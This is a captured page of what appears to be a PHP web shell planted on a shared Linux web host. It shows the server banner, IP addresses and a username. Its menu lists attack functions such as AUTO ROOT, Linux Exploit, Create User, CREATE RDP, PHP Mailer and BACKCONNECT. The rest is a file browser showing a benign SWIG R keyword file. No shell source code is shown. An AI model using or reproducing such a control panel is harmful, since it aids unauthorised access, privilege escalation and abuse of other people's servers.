Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
swig4.0 /
r /
[ HOME SHELL ]
Name
Size
Permission
Action
boost_shared_ptr.i
20.88
KB
-rw-r--r--
cdata.i
30
B
-rw-r--r--
exception.i
225
B
-rw-r--r--
r.swg
6.27
KB
-rw-r--r--
rcontainer.swg
5.38
KB
-rw-r--r--
rfragments.swg
4.74
KB
-rw-r--r--
rkw.swg
682
B
-rw-r--r--
ropers.swg
939
B
-rw-r--r--
rrun.swg
9.98
KB
-rw-r--r--
rstdcommon.swg
4.96
KB
-rw-r--r--
rtype.swg
8.18
KB
-rw-r--r--
srun.swg
3.82
KB
-rw-r--r--
std_alloc.i
26
B
-rw-r--r--
std_common.i
2.22
KB
-rw-r--r--
std_container.i
57
B
-rw-r--r--
std_deque.i
25
B
-rw-r--r--
std_except.i
35
B
-rw-r--r--
std_list.i
167
B
-rw-r--r--
std_map.i
67
B
-rw-r--r--
std_pair.i
68
B
-rw-r--r--
std_shared_ptr.i
68
B
-rw-r--r--
std_string.i
35
B
-rw-r--r--
std_vector.i
37.91
KB
-rw-r--r--
stl.i
270
B
-rw-r--r--
typemaps.i
33
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rkw.swg
/* Warnings for R keywords, built-in names and bad names. */ #define RKW(x) %keywordwarn("'" `x` "' is a R keyword, renaming to '_" `x`"'", rename="_%s") `x` #define RSWIGKW(x) %keywordwarn("'" `x` "' is a SWIG R reserved parameter name, renaming to '_" `x`"'", rename="_%s") `x` /* Warnings for R reserved words taken from http://cran.r-project.org/doc/manuals/R-lang.html#Reserved-words */ RKW(if); RKW(else); RKW(repeat); RKW(while); RKW(function); RKW(for); RKW(in); RKW(next); RKW(break); RKW(TRUE); RKW(FALSE); RKW(NULL); RKW(Inf); RKW(NaN); RKW(NA); RKW(NA_integer_); RKW(NA_real_); RKW(NA_complex_); RKW(NA_character_); RSWIGKW(self); #undef RKW #undef RSWIGKW
Close